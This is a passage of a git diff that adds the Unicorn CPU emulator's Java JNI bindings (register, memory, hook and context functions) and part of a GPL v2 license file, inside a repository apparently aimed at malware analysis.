(1/2/4) to be written to this port +// @value: data value to be written to this port +static void cb_insn_out(uc_engine *eng, uint32_t port, int size, uint32_t value, void *user_data) { + JNIEnv *env; + (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); + jclass clz = (*env)->FindClass(env, "unicorn/Unicorn"); + if ((*env)->ExceptionCheck(env)) { + return; + } + (*env)->CallStaticVoidMethod(env, clz, invokeOutCallbacks, (jlong)eng, (jint)port, (jint)size, (jint)value); + (*cachedJVM)->DetachCurrentThread(cachedJVM); +} + +// x86's handler for SYSCALL/SYSENTER +static void cb_insn_syscall(uc_engine *eng, void *user_data) { + JNIEnv *env; + (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); + jclass clz = (*env)->FindClass(env, "unicorn/Unicorn"); + if ((*env)->ExceptionCheck(env)) { + return; + } + (*env)->CallStaticVoidMethod(env, clz, invokeSyscallCallbacks, (jlong)eng); + (*cachedJVM)->DetachCurrentThread(cachedJVM); +} + +// Callback function for hooking memory (UC_HOOK_MEM_*) +// @type: this memory is being READ, or WRITE +// @address: address where the code is being executed +// @size: size of data being read or written +// @value: value of data being written to memory, or irrelevant if type = READ. +// @user_data: user data passed to tracing APIs +static void cb_hookmem(uc_engine *eng, uc_mem_type type, + uint64_t address, int size, int64_t value, void *user_data) { + JNIEnv *env; + (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); + jclass clz = (*env)->FindClass(env, "unicorn/Unicorn"); + if ((*env)->ExceptionCheck(env)) { + return; + } + switch (type) { + case UC_MEM_READ: + (*env)->CallStaticVoidMethod(env, clz, invokeReadCallbacks, (jlong)eng, (jlong)address, (int)size); + break; + case UC_MEM_WRITE: + (*env)->CallStaticVoidMethod(env, clz, invokeWriteCallbacks, (jlong)eng, (jlong)address, (int)size, (jlong)value); + break; + } + (*cachedJVM)->DetachCurrentThread(cachedJVM); +} + +// Callback function for handling memory events (for UC_HOOK_MEM_UNMAPPED) +// @type: this memory is being READ, or WRITE +// @address: address where the code is being executed +// @size: size of data being read or written +// @value: value of data being written to memory, or irrelevant if type = READ. +// @user_data: user data passed to tracing APIs +// @return: return true to continue, or false to stop program (due to invalid memory). +static bool cb_eventmem(uc_engine *eng, uc_mem_type type, + uint64_t address, int size, int64_t value, void *user_data) { + JNIEnv *env; + (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); + jclass clz = (*env)->FindClass(env, "unicorn/Unicorn"); + if ((*env)->ExceptionCheck(env)) { + return false; + } + jboolean res = (*env)->CallStaticBooleanMethod(env, clz, invokeEventMemCallbacks, (jlong)eng, (int)type, (jlong)address, (int)size, (jlong)value); + (*cachedJVM)->DetachCurrentThread(cachedJVM); + return res; +} + +static void throwException(JNIEnv *env, uc_err err) { + //throw exception + jclass clazz = (*env)->FindClass(env, "unicorn/UnicornException"); + if (err != UC_ERR_OK) { + const char *msg = uc_strerror(err); + (*env)->ThrowNew(env, clazz, msg); + } +} + +static uc_engine *getEngine(JNIEnv *env, jobject self) { + static int haveFid = 0; + static jfieldID fid; + if (haveFid == 0) { + //cache the field id + jclass clazz = (*env)->GetObjectClass(env, self); + fid = (*env)->GetFieldID(env, clazz, "eng", "J"); + haveFid = 1; + } + return (uc_engine *)(*env)->GetLongField(env, self, fid); +} + +/* + * Class: unicorn_Unicorn + * Method: reg_write_num + * Signature: (ILjava/lang/Number;)V + */ +JNIEXPORT void JNICALL Java_unicorn_Unicorn_reg_1write_1num + (JNIEnv *env, jobject self, jint regid, jobject value) { + uc_engine *eng = getEngine(env, self); + + jclass clz = (*env)->FindClass(env, "java/lang/Number"); + if ((*env)->ExceptionCheck(env)) { + return; + } + + jmethodID longValue = (*env)->GetMethodID(env, clz, "longValue", "()J"); + jlong longVal = (*env)->CallLongMethod(env, value, longValue); + uc_err err = uc_reg_write(eng, regid, &longVal); + if (err != UC_ERR_OK) { + throwException(env, err); + } +} + +/* + * Class: unicorn_Unicorn + * Method: reg_write_mmr + * Signature: (ILunicorn/X86_MMR;)V + */ +JNIEXPORT void JNICALL Java_unicorn_Unicorn_reg_1write_1mmr + (JNIEnv *env, jobject self, jint regid, jobject value) { + uc_engine *eng = getEngine(env, self); + uc_x86_mmr mmr; + + jclass clz = (*env)->FindClass(env, "unicorn/X86_MMR"); + if ((*env)->ExceptionCheck(env)) { + return; + } + + jfieldID fid = (*env)->GetFieldID(env, clz, "base", "J"); + mmr.base = (uint64_t)(*env)->GetLongField(env, value, fid); + + fid = (*env)->GetFieldID(env, clz, "limit", "I"); + mmr.limit = (uint32_t)(*env)->GetLongField(env, value, fid); + + fid = (*env)->GetFieldID(env, clz, "flags", "I"); + mmr.flags = (uint32_t)(*env)->GetLongField(env, value, fid); + + fid = (*env)->GetFieldID(env, clz, "selector", "S"); + mmr.selector = (uint16_t)(*env)->GetLongField(env, value, fid); + + uc_err err = uc_reg_write(eng, regid, &mmr); + if (err != UC_ERR_OK) { + throwException(env, err); + } +} + +/* + * Class: unicorn_Unicorn + * Method: reg_read_num + * Signature: (I)Ljava/lang/Number; + */ +JNIEXPORT jobject JNICALL Java_unicorn_Unicorn_reg_1read_1num + (JNIEnv *env, jobject self, jint regid) { + uc_engine *eng = getEngine(env, self); + + jclass clz = (*env)->FindClass(env, "java/lang/Long"); + if ((*env)->ExceptionCheck(env)) { + return NULL; + } + + jlong longVal; + uc_err err = uc_reg_read(eng, regid, &longVal); + if (err != UC_ERR_OK) { + throwException(env, err); + } + + jmethodID cons = (*env)->GetMethodID(env, clz, "", "(J)V"); + jobject result = (*env)->NewObject(env, clz, cons, longVal); + if ((*env)->ExceptionCheck(env)) { + return NULL; + } + return result; +} + +/* + * Class: unicorn_Unicorn + * Method: reg_read_mmr + * Signature: (I)Ljava/lang/Number; + */ +JNIEXPORT jobject JNICALL Java_unicorn_Unicorn_reg_1read_1mmr + (JNIEnv *env, jobject self, jint regid) { + uc_engine *eng = getEngine(env, self); + + jclass clz = (*env)->FindClass(env, "unicorn/X86_MMR"); + if ((*env)->ExceptionCheck(env)) { + return NULL; + } + + uc_x86_mmr mmr; + uc_err err = uc_reg_read(eng, regid, &mmr); + if (err != UC_ERR_OK) { + throwException(env, err); + } + + jmethodID cons = (*env)->GetMethodID(env, clz, "", "(JIIS)V"); + jobject result = (*env)->NewObject(env, clz, cons, mmr.base, mmr.limit, mmr.flags, mmr.selector); + if ((*env)->ExceptionCheck(env)) { + return NULL; + } + return result; +} + +/* + * Class: unicorn_Unicorn + * Method: open + * Signature: (II)J + */ +JNIEXPORT jlong JNICALL Java_unicorn_Unicorn_open + (JNIEnv *env, jobject self, jint arch, jint mode) { + uc_engine *eng = NULL; + uc_err err = uc_open((uc_arch)arch, (uc_mode)mode, &eng); + if (err != UC_ERR_OK) { + throwException(env, err); + } + return (jlong)eng; +} + +/* + * Class: unicorn_Unicorn + * Method: version + * Signature: ()I + */ +JNIEXPORT jint JNICALL Java_unicorn_Unicorn_version + (JNIEnv *env, jclass clz) { + return (jint)uc_version(NULL, NULL); +} + +/* + * Class: unicorn_Unicorn + * Method: arch_supported + * Signature: (I)Z + */ +JNIEXPORT jboolean JNICALL Java_unicorn_Unicorn_arch_1supported + (JNIEnv *env, jclass clz, jint arch) { + return (jboolean)(uc_arch_supported((uc_arch)arch) != 0); +} + +/* + * Class: unicorn_Unicorn + * Method: close + * Signature: ()V + */ +JNIEXPORT void JNICALL Java_unicorn_Unicorn_close + (JNIEnv *env, jobject self) { + uc_engine *eng = getEngine(env, self); + uc_err err = uc_close(eng); + if (err != UC_ERR_OK) { + throwException(env, err); + } + //We also need to ReleaseByteArrayElements for any regions that + //were mapped with uc_mem_map_ptr +} + +/* + * Class: unicorn_Unicorn + * Method: query + * Signature: (I)I + */ +JNIEXPORT jint JNICALL Java_unicorn_Unicorn_query + (JNIEnv *env, jobject self, jint type) { + uc_engine *eng = getEngine(env, self); + size_t result; + uc_err err = uc_query(eng, type, &result); + if (err != UC_ERR_OK) { + throwException(env, err); + } + return (jint)result; +} + +/* + * Class: unicorn_Unicorn + * Method: errno + * Signature: ()I + */ +JNIEXPORT jint JNICALL Java_unicorn_Unicorn_errno + (JNIEnv *env, jobject self) { + uc_engine *eng = getEngine(env, self); + return (jint)uc_errno(eng); +} + +/* + * Class: unicorn_Unicorn + * Method: strerror + * Signature: (I)Ljava/lang/String; + */ +JNIEXPORT jstring JNICALL Java_unicorn_Unicorn_strerror + (JNIEnv *env, jclass clz, jint code) { + const char *err = uc_strerror((int)code); + jstring s = (*env)->NewStringUTF(env, err); + return s; +} + +/* + * Class: unicorn_Unicorn + * Method: reg_write + * Signature: (I[B)V + */ +JNIEXPORT void JNICALL Java_unicorn_Unicorn_reg_1write + (JNIEnv *env, jobject self, jint regid, jbyteArray value) { + uc_engine *eng = getEngine(env, self); + jbyte *array = (*env)->GetByteArrayElements(env, value, NULL); + uc_err err = uc_reg_write(eng, (int)regid, (void *)array); + if (err != UC_ERR_OK) { + throwException(env, err); + } + (*env)->ReleaseByteArrayElements(env, value, array, JNI_ABORT); +} + +/* + * Class: unicorn_Unicorn + * Method: reg_read + * Signature: (II)[B + */ +JNIEXPORT jbyteArray JNICALL Java_unicorn_Unicorn_reg_1read + (JNIEnv *env, jobject self, jint regid, jint regsz) { + uc_engine *eng = getEngine(env, self); + jbyteArray regval = (*env)->NewByteArray(env, (jsize)regsz); + jbyte *array = (*env)->GetByteArrayElements(env, regval, NULL); + uc_err err = uc_reg_read(eng, (int)regid, (void *)array); + if (err != UC_ERR_OK) { + throwException(env, err); + } + (*env)->ReleaseByteArrayElements(env, regval, array, 0); + return regval; +} + +/* + * Class: unicorn_Unicorn + * Method: mem_write + * Signature: (J[B)V + */ +JNIEXPORT void JNICALL Java_unicorn_Unicorn_mem_1write + (JNIEnv *env , jobject self, jlong address, jbyteArray bytes) { + + uc_engine *eng = getEngine(env, self); + jbyte *array = (*env)->GetByteArrayElements(env, bytes, NULL); + jsize size = (*env)->GetArrayLength(env, bytes); + uc_err err = uc_mem_write(eng, (uint64_t)address, array, (size_t)size); + + if (err != UC_ERR_OK) { + throwException(env, err); + } + + (*env)->ReleaseByteArrayElements(env, bytes, array, JNI_ABORT); +} + +/* + * Class: unicorn_Unicorn + * Method: mem_read + * Signature: (JJ)[B + */ +JNIEXPORT jbyteArray JNICALL Java_unicorn_Unicorn_mem_1read + (JNIEnv *env, jobject self, jlong address, jlong size) { + uc_engine *eng = getEngine(env, self); + + jbyteArray bytes = (*env)->NewByteArray(env, (jsize)size); + jbyte *array = (*env)->GetByteArrayElements(env, bytes, NULL); + uc_err err = uc_mem_read(eng, (uint64_t)address, array, (size_t)size); + if (err != UC_ERR_OK) { + throwException(env, err); + } + (*env)->ReleaseByteArrayElements(env, bytes, array, 0); + return bytes; +} + +/* + * Class: unicorn_Unicorn + * Method: emu_start + * Signature: (JJJJ)V + */ +JNIEXPORT void JNICALL Java_unicorn_Unicorn_emu_1start + (JNIEnv *env, jobject self, jlong begin, jlong until, jlong timeout, jlong count) { + uc_engine *eng = getEngine(env, self); + + uc_err err = uc_emu_start(eng, (uint64_t)begin, (uint64_t)until, (uint64_t)timeout, (size_t)count); + if (err != UC_ERR_OK) { + throwException(env, err); + } +} + +/* + * Class: unicorn_Unicorn + * Method: emu_stop + * Signature: ()V + */ +JNIEXPORT void JNICALL Java_unicorn_Unicorn_emu_1stop + (JNIEnv *env, jobject self) { + uc_engine *eng = getEngine(env, self); + + uc_err err = uc_emu_stop(eng); + if (err != UC_ERR_OK) { + throwException(env, err); + } +} + +/* + * Class: unicorn_Unicorn + * Method: registerHook + * Signature: (JI)J + */ +JNIEXPORT jlong JNICALL Java_unicorn_Unicorn_registerHook__JI + (JNIEnv *env, jclass clz, jlong eng, jint type) { + uc_hook hh = 0; + uc_err err = 0; + switch (type) { + case UC_HOOK_INTR: // Hook all interrupt events + if (invokeInterruptCallbacks == 0) { + invokeInterruptCallbacks = (*env)->GetStaticMethodID(env, clz, "invokeInterruptCallbacks", "(JI)V"); + } + err = uc_hook_add((uc_engine*)eng, &hh, (uc_hook_type)type, cb_hookintr, env, 1, 0); + break; + case UC_HOOK_MEM_FETCH_UNMAPPED: // Hook for all invalid memory access events + case UC_HOOK_MEM_READ_UNMAPPED: // Hook for all invalid memory access events + case UC_HOOK_MEM_WRITE_UNMAPPED: // Hook for all invalid memory access events + case UC_HOOK_MEM_FETCH_PROT: // Hook for all invalid memory access events + case UC_HOOK_MEM_READ_PROT: // Hook for all invalid memory access events + case UC_HOOK_MEM_WRITE_PROT: // Hook for all invalid memory access events + if (invokeEventMemCallbacks == 0) { + invokeEventMemCallbacks = (*env)->GetStaticMethodID(env, clz, "invokeEventMemCallbacks", "(JIJIJ)Z"); + } + err = uc_hook_add((uc_engine*)eng, &hh, (uc_hook_type)type, cb_eventmem, env, 1, 0); + break; + } + return (jlong)hh; +} + +/* + * Class: unicorn_Unicorn + * Method: registerHook + * Signature: (JII)J + */ +JNIEXPORT jlong JNICALL Java_unicorn_Unicorn_registerHook__JII + (JNIEnv *env, jclass clz, jlong eng, jint type, jint arg1) { + uc_hook hh = 0; + uc_err err = 0; + switch (type) { + case UC_HOOK_INSN: // Hook a particular instruction + switch (arg1) { + case UC_X86_INS_OUT: + if (invokeOutCallbacks == 0) { + invokeOutCallbacks = (*env)->GetStaticMethodID(env, clz, "invokeOutCallbacks", "(JIII)V"); + } + err = uc_hook_add((uc_engine*)eng, &hh, (uc_hook_type)type, cb_insn_out, env, 1, 0, arg1); + case UC_X86_INS_IN: + if (invokeInCallbacks == 0) { + invokeInCallbacks = (*env)->GetStaticMethodID(env, clz, "invokeInCallbacks", "(JII)I"); + } + err = uc_hook_add((uc_engine*)eng, &hh, (uc_hook_type)type, cb_insn_in, env, 1, 0, arg1); + case UC_X86_INS_SYSENTER: + case UC_X86_INS_SYSCALL: + if (invokeSyscallCallbacks == 0) { + invokeSyscallCallbacks = (*env)->GetStaticMethodID(env, clz, "invokeSyscallCallbacks", "(J)V"); + } + err = uc_hook_add((uc_engine*)eng, &hh, (uc_hook_type)type, cb_insn_syscall, env, 1, 0, arg1); + } + break; + } + return (jlong)hh; +} + +/* + * Class: unicorn_Unicorn + * Method: registerHook + * Signature: (JIJJ)J + */ +JNIEXPORT jlong JNICALL Java_unicorn_Unicorn_registerHook__JIJJ + (JNIEnv *env, jclass clz, jlong eng, jint type, jlong arg1, jlong arg2) { + uc_hook hh = 0; + uc_err err = 0; + switch (type) { + case UC_HOOK_CODE: // Hook a range of code + if (invokeCodeCallbacks == 0) { + invokeCodeCallbacks = (*env)->GetStaticMethodID(env, clz, "invokeCodeCallbacks", "(JJI)V"); + } + err = uc_hook_add((uc_engine*)eng, &hh, (uc_hook_type)type, cb_hookcode, env, 1, 0, arg1, arg2); + break; + case UC_HOOK_BLOCK: // Hook basic blocks + if (invokeBlockCallbacks == 0) { + invokeBlockCallbacks = (*env)->GetStaticMethodID(env, clz, "invokeBlockCallbacks", "(JJI)V"); + } + err = uc_hook_add((uc_engine*)eng, &hh, (uc_hook_type)type, cb_hookblock, env, 1, 0, arg1, arg2); + break; + case UC_HOOK_MEM_READ: // Hook all memory read events. + if (invokeReadCallbacks == 0) { + invokeReadCallbacks = (*env)->GetStaticMethodID(env, clz, "invokeReadCallbacks", "(JJI)V"); + } + err = uc_hook_add((uc_engine*)eng, &hh, (uc_hook_type)type, cb_hookmem, env, 1, 0, arg1, arg2); + break; + case UC_HOOK_MEM_WRITE: // Hook all memory write events. + if (invokeWriteCallbacks == 0) { + invokeWriteCallbacks = (*env)->GetStaticMethodID(env, clz, "invokeWriteCallbacks", "(JJIJ)V"); + } + err = uc_hook_add((uc_engine*)eng, &hh, (uc_hook_type)type, cb_hookmem, env, 1, 0, arg1, arg2); + break; + } + return (jlong)hh; +} + +/* + * Class: unicorn_Unicorn + * Method: hook_del + * Signature: (J)V + */ +JNIEXPORT void JNICALL Java_unicorn_Unicorn_hook_1del + (JNIEnv *env, jobject self, jlong hh) { + uc_engine *eng = getEngine(env, self); + + //**** TODO remove hook from any internal hook tables as well + + uc_err err = uc_hook_del(eng, (uc_hook)hh); + if (err != UC_ERR_OK) { + throwException(env, err); + } +} + +/* + * Class: unicorn_Unicorn + * Method: mem_map + * Signature: (JJI)V + */ +JNIEXPORT void JNICALL Java_unicorn_Unicorn_mem_1map + (JNIEnv *env, jobject self, jlong address, jlong size, jint perms) { + uc_engine *eng = getEngine(env, self); + + uc_err err = uc_mem_map(eng, (uint64_t)address, (size_t)size, (uint32_t)perms); + if (err != UC_ERR_OK) { + throwException(env, err); + } +} + +/* + * Class: unicorn_Unicorn + * Method: mem_map_ptr + * Signature: (JJI[B)V + */ +JNIEXPORT void JNICALL Java_unicorn_Unicorn_mem_1map_1ptr + (JNIEnv *env, jobject self, jlong address, jlong size, jint perms, jbyteArray block) { + uc_engine *eng = getEngine(env, self); + jbyte *array = (*env)->GetByteArrayElements(env, block, NULL); + uc_err err = uc_mem_map_ptr(eng, (uint64_t)address, (size_t)size, (uint32_t)perms, (void*)array); + if (err != UC_ERR_OK) { + throwException(env, err); + } + //Need to track address/block/array so that we can ReleaseByteArrayElements when the + //block gets unmapped or when uc_close gets called + //(*env)->ReleaseByteArrayElements(env, block, array, JNI_ABORT); +} + +/* + * Class: unicorn_Unicorn + * Method: mem_unmap + * Signature: (JJ)V + */ +JNIEXPORT void JNICALL Java_unicorn_Unicorn_mem_1unmap + (JNIEnv *env, jobject self, jlong address, jlong size) { + uc_engine *eng = getEngine(env, self); + + uc_err err = uc_mem_unmap(eng, (uint64_t)address, (size_t)size); + if (err != UC_ERR_OK) { + throwException(env, err); + } + + //If a region was mapped using uc_mem_map_ptr, we also need to + //ReleaseByteArrayElements for that region +} + +/* + * Class: unicorn_Unicorn + * Method: mem_protect + * Signature: (JJI)V + */ +JNIEXPORT void JNICALL Java_unicorn_Unicorn_mem_1protect + (JNIEnv *env, jobject self, jlong address, jlong size, jint perms) { + uc_engine *eng = getEngine(env, self); + + uc_err err = uc_mem_protect(eng, (uint64_t)address, (size_t)size, (uint32_t)perms); + if (err != UC_ERR_OK) { + throwException(env, err); + } +} + +/* + * Class: unicorn_Unicorn + * Method: mem_regions + * Signature: ()[Lunicorn/MemRegion; + */ +JNIEXPORT jobjectArray JNICALL Java_unicorn_Unicorn_mem_1regions + (JNIEnv *env, jobject self) { + uc_engine *eng = getEngine(env, self); + + uc_mem_region *regions = NULL; + uint32_t count = 0; + uint32_t i; + + uc_err err = uc_mem_regions(eng, ®ions, &count); + if (err != UC_ERR_OK) { + throwException(env, err); + } + jclass clz = (*env)->FindClass(env, "unicorn/MemRegion"); + if ((*env)->ExceptionCheck(env)) { + return NULL; + } + jobjectArray result = (*env)->NewObjectArray(env, (jsize)count, clz, NULL); + jmethodID cons = (*env)->GetMethodID(env, clz, "", "(JJI)V"); + for (i = 0; i < count; i++) { + jobject mr = (*env)->NewObject(env, clz, cons, regions[i].begin, regions[i].end, regions[i].perms); + (*env)->SetObjectArrayElement(env, result, (jsize)i, mr); + } + uc_free(regions); + + return result; +} + +/* + * Class: unicorn_Unicorn + * Method: context_alloc + * Signature: ()J + */ +JNIEXPORT jlong JNICALL Java_unicorn_Unicorn_context_1alloc + (JNIEnv *env, jobject self) { + uc_engine *eng = getEngine(env, self); + uc_context *ctx; + uc_err err = uc_context_alloc(eng, &ctx); + if (err != UC_ERR_OK) { + throwException(env, err); + } + return (jlong)(uint64_t)ctx; +} + +/* + * Class: unicorn_Unicorn + * Method: free + * Signature: (J)V + */ +JNIEXPORT void JNICALL Java_unicorn_Unicorn_free + (JNIEnv *env, jobject self, jlong ctx) { + uc_err err = uc_free((void *)ctx); + if (err != UC_ERR_OK) { + throwException(env, err); + } +} + +/* + * Class: unicorn_Unicorn + * Method: context_save + * Signature: (J)V + */ +JNIEXPORT void JNICALL Java_unicorn_Unicorn_context_1save + (JNIEnv *env, jobject self, jlong ctx) { + uc_engine *eng = getEngine(env, self); + uc_err err = uc_context_save(eng, (uc_context*)ctx); + if (err != UC_ERR_OK) { + throwException(env, err); + } +} + +/* + * Class: unicorn_Unicorn + * Method: context_restore + * Signature: (J)V + */ +JNIEXPORT void JNICALL Java_unicorn_Unicorn_context_1restore + (JNIEnv *env, jobject self, jlong ctx) { + uc_engine *eng = getEngine(env, self); + uc_err err = uc_context_restore(eng, (uc_context*)ctx); + if (err != UC_ERR_OK) { + throwException(env, err); + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/LICENSE b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/LICENSE new file mode 100644 index 0000000..61a3fc5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/LICENSE @@ -0,0 +1,339 @@ +GNU GENERAL PUBLIC LICENSE + Version 2, June 1991 + + Copyright (C) 1989, 1991 Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The licenses for most software are designed to take away your +freedom to share and change it. By contrast, the GNU General Public +License is intended to guarantee your freedom to share and change free +software--to make sure the software is free for all its users. This +General Public License applies to most of the Free Software +Foundation's software and to any other program whose authors commit to +using it. (Some other Free Software Foundation software is covered by +the GNU Lesser General Public License instead.) You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +this service if you wish), that you receive source code or can get it +if you want it, that you can change the software or use pieces of it +in new free programs; and that you know you can do these things. + + To protect your rights, we need to make restrictions that forbid +anyone to deny you these rights or to ask you to surrender the rights. +These restrictions translate to certain responsibilities for you if you +distribute copies of the software, or if you modify it. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must give the recipients all the rights that +you have. You must make sure that they, too, receive or can get the +source code. And you must show them these terms so they know their +rights. + + We protect your rights with two steps: (1) copyright the software, and +(2) offer you this license which gives you legal permission to copy, +distribute and/or modify the software. + + Also, for each author's protection and ours, we want to make certain +that everyone understands that there is no warranty for this free +software. If the software is modified by someone else and passed on, we +want its recipients to know that what they have is not the original, so +that any problems introduced by others will not reflect on the original +authors' reputations. + + Finally, any free program is threatened constantly by software +patents. We wish to avoid the danger that redistributors of a free +program will individually obtain patent licenses, in effect making the +program proprietary. To prevent this, we have made it clear that any +patent must be licensed for everyone's free use or not licensed at all. + + The precise terms and conditions for copying, distribution and +modification follow. + + GNU GENERAL PUBLIC LICENSE + TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + + 0. This License applies to any program or other work which contains +a notice placed by the copyright holder saying it may be distributed +under the terms of this General Public License. The "Program", below, +refers to any such program or work, and a "work based on the Program" +means either the Program or any derivative work under copyright law: +that is to say, a work containing the Program or a portion of it, +either verbatim or with modifications and/or translated into another +language. (Hereinafter, translation is included without limitation in +the term "modification".) Each licensee is addressed as "you". + +Activities other than copying, distribution and modification are not +covered by this License; they are outside its scope. The act of +running the Program is not restricted, and the output from the Program +is covered only if its contents constitute a work based on the +Program (independent of having been made by running the Program). +Whether that is true depends on what the Program does. + + 1. You may copy and distribute verbatim copies of the Program's +source code as you receive it, in any medium, provided that you +conspicuously and appropriately publish on each copy an appropriate +copyright notice and disclaimer of warranty; keep intact all the +notices that refer to this License and to the absence of any warranty; +and give any other recipients of the Program a copy of this License +along with the Program. + +You may charge a fee for the physical act of transferring a copy, and +you may at your option offer warranty protection in exchange for a fee. + + 2. You may modify your copy or copies of the Program or any portion +of it, thus forming a work based on the Program, and copy and +distribute such modifications or work under the terms of Section 1 +above, provided that you also meet all of these conditions: + + a) You must cause the modified files to carry prominent notices + stating that you changed the files and the date of any change. + + b) You must cause any work that you distribute or publish, that in + whole or in part contains or is derived from the Program or any + part thereof, to be licensed as a whole at no charge to all third + parties under the terms of this License. + + c) If the modified program normally reads commands interactively + when run, you must cause it, when started running for such + interactive use in the most ordinary way, to print or display an + announcement including an appropriate copyright notice and a + notice that there is no warranty (or else, saying that you provide + a warranty) and that users may redistribute the program under + these conditions, and telling the user how to view a copy of this + License. (Exception: if the Program itself is interactive but + does not normally print such an announcement, your work based on + the Program is not required to print an announcement.) + +These requirements apply to the modified work as a whole. If +identifiable sections of that work are not derived from the Program, +and can be reasonably considered independent and separate works in +themselves, then this License, and its terms, do not apply to those +sections when you distribute them as separate works. But when you +distribute the same sections as part of a whole which is a work based +on the Program, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the +entire whole, and thus to each and every part regardless of who wrote it. + +Thus, it is not the intent of this section to claim rights or contest +your rights to work written entirely by you; rather, the intent is to +exercise the right to control the distribution of derivative or +collective works based on the Program. + +In addition, mere aggregation of another work not based on the Program +with the Program (or with a work based on the Program) on a volume of +a storage or distribution medium does not bring the other work under +the scope of this License. + + 3. You may copy and distribute the Program (or a work based on it, +under Section 2) in object code or executable form under the terms of +Sections 1 and 2 above provided that you also do one of the following: + + a) Accompany it with the complete corresponding machine-readable + source code, which must be distributed under the terms of Sections + 1 and 2 above on a medium customarily used for software interchange; or, + + b) Accompany it with a written offer, valid for at least three + years, to give any third party, for a charge no more than your + cost of physically performing source distribution, a complete + machine-readable copy of the corresponding source code, to be + distributed under the terms of Sections 1 and 2 above on a medium + customarily used for software interchange; or, + + c) Accompany it with the information you received as to the offer + to distribute corresponding source code. (This alternative is + allowed only for noncommercial distribution and only if you + received the program in object code or executable form with such + an offer, in accord with Subsection b above.) + +The source code for a work means the preferred form of the work for +making modifications to it. For an executable work, complete source +code means all the source code for all modules it contains, plus any +associated interface definition files, plus the scripts used to +control compilation and installation of the executable. However, as a +special exception, the source code distributed need not include +anything that is normally distributed (in either source or binary +form) with the major components (compiler, kernel, and so on) of the +operating system on which the executable runs, unless that component +itself accompanies the executable. + +If distribution of executable or object code is made by offering +access to copy from a designated place, then offering equivalent +access to copy the source code from the same place counts as +distribution of the source code, even though third parties are not +compelled to copy the source along with the object code. + + 4. You may not copy, modify, sublicense, or distribute the Program +except as expressly provided under this License. Any attempt +otherwise to copy, modify, sublicense or distribute the Program is +void, and will automatically terminate your rights under this License. +However, parties who have received copies, or rights, from you under +this License will not have their licenses terminated so long as such +parties remain in full compliance. + + 5. You are not required to accept this License, since you have not +signed it. However, nothing else grants you permission to modify or +distribute the Program or its derivative works. These actions are +prohibited by law if you do not accept this License. Therefore, by +modifying or distributing the Program (or any work based on the +Program), you indicate your acceptance of this License to do so, and +all its terms and conditions for copying, distributing or modifying +the Program or works based on it. + + 6. Each time you redistribute the Program (or any work based on the +Program), the recipient automatically receives a license from the +original licensor to copy, distribute or modify the Program subject to +these terms and conditions. You may not impose any further +restrictions on the recipients' exercise of the rights granted herein. +You are not responsible for enforcing compliance by third parties to +this License. + + 7. If, as a consequence of a court judgment or allegation of patent +infringement or for any other reason (not limited to patent issues), +conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot +distribute so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you +may not distribute the Program at all. For example, if a patent +license would not permit royalty-free redistribution of the Program by +all those who receive copies directly or indirectly through you, then +the only way you could satisfy both it and this License would be to +refrain entirely from distribution of the Program. + +If any portion of this section is held invalid or unenforceable under +any particular circumstance, the balance of the section is intended to +apply and the section as a whole is intended to apply in other +circumstances. + +It is not the purpose of this section to induce you to infringe any +patents or other property right claims or to contest validity of any +such claims; this section has the sole purpose of protecting the +integrity of the free software distribution system, which is +implemented by public license practices. Many people have made +generous contributions to the wide range of software distributed +through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing +to distribute software through any other system and a licensee cannot +impose that choice. + +This section is intended to make thoroughly clear what is believed to +be a consequence of the rest of this License. + + 8. If the distribution and/or use of the Program is restricted in +certain countries either by patents or by copyrighted interfaces, the +original copyright holder who places the Program under this License +may add an explicit geographical distribution limitation excluding +those countries, so that distribution is permitted only in or among +countries not thus excluded. In such case, this License incorporates +the limitation as if written in the body of this License. + + 9. The Free Software Foundation may publish revised and/or new versions +of the General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + +Each version is given a distinguishing version number. If the Program +specifies a version number of this License which applies to it and "any +later version", you have the option of following the terms and conditions +either of that version or of any later version published by the Free +Software Foundation. If the Program does not specify a version number of +this License, you may choose any version ever published by the Free Software +Foundation. + + 10. If you wish to incorporate parts of the Program into other free +programs whose distribution conditions are different, write to the author +to ask for permission. For software which is copyrighted by the Free +Software Foundation, write to the Free Software Foundation; we sometimes +make exceptions for this. Our decision will be guided by the two goals +of preserving the free status of all derivatives of our free software and +of promoting the sharing and reuse of software generally. + + NO WARRANTY + + 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY +FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN +OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES +PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED +OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS +TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE +PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, +REPAIR OR CORRECTION. + + 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR +REDISTRIBUTE 